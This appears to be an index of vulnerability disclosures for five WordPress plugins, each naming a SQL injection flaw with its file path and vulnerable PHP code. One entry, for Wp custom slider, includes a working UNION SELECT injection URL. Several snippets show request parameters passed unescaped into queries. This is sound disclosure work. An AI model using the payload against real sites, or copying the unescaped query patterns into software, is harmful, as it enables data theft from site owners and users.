WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/wp-email-users/

Description:
Type user access: accessible for any registered user. $_REQUEST['edit'] is escaped incorrectly. Attack with SQL Injection.

File / Code:
Path: /wp-content/plugin/wp-email-users/wp-email-user-ajax.php
Line: 197

    if($temp_sel_key == 'select_temp'){
        $myrows = $wpdb->get_results( "SELECT template_value FROM `".$table_name."` where id = $temp");
        $data=$myrows[0]->template_value;
    }

Proof of Concept:
1 – Login as regular user …

Wp custom slider 1.6.2 – Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/wp-custom-slider/

Description:
Type user access: admin user. $_REQUEST['edit'] is escaped incorrectly. Attack with SQL Injection.

File / Code:
Path: /wp-content/plugin/wp-custom-slider/customslider-ex-settings.php
Line: 371

    if(isset($_REQUEST['edit'])) {
        $id=$_REQUEST['edit'];
        $query_pag_data=$wpdb->get_results("select * from ".$wpdb->prefix."customslider_images where id=$id");
    ?>

Proof of Concept:
1 – Login with admin user.
2 – Url with injection: http://target/wp-admin/options-general.php?page=custom_slider&showall=a&edit=0+UNION+SELECT+1,CONCAT(name,char(58),slug),3,4,5,6,7+FROM+wp_terms+WHERE+term_id=1
3 – Result:

Timeline: …

ZX_CSV Upload 1 Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/zx-csv-upload/

Description:
Type user access: admin user. $_GET['id'] is not escaped. Url is accessible for every registered user.

File / Code:
Path: /wp-content/plugin/zx-csv-upload/zx_csv_home.php
Line: 53

    if(isset($_POST['rsltsbmt'])) {
        $table_name = $_POST['table_select'];
        $rlfrom=$_POST['rsltfrom'];
        $rlto=$_POST['rsltto'];
    }
    …
    global $wpdb;
    //$tname=$wpdb->prefix.'currency';
    $result = $wpdb->get_results( "SELECT * FROM $table_name limit $rlfrom,$rlto");
    ?>

Proof of Concept:
1 …

WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/wp-private-messages/

Description:
Type user access: registered user. $_GET['id'] is not escaped. Url is accessible for every registered user.

File / Code:
Path: /wp-content/plugin/wp-private-messages/wpu_private_messages.php
Line: 218

    global $current_user, $wpulang;
    $id = $_GET["id"];
    $user = $_GET["name"];
    …
    $bf = "<tr><td class=\"left\">";
    $mid = ": </td><td>";
    $af = "</td></tr>";
    $pm = $wpdb->get_row("SELECT * FROM …

Xtreme Locator Dealer Locator Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/xtremelocator/

Description:
Type user access: admin users. $_GET['id'] is not escaped. Accessible only for admin users.

File / Code:
Path: /wp-content/plugins/xtremelocator/functions.xtremelocator.php
Line: 112

    if((isset($_GET['id'])||(isset($_POST['action'])&&$_POST['action']=="add_field"))&&!isset($_POST['field_action'])){
        if(isset($_GET['id'])){
            $field=$wpdb->get_results("SELECT * FROM `".$wpdb->prefix."xtremelocator_fields` WHERE id=".$_GET['id']);
        }
        include_once($xl_path."/views/add_field.php");
    }else{

Proof of Concept:
1 – Using url, sqli by get:
2 – Result:

Timeline: …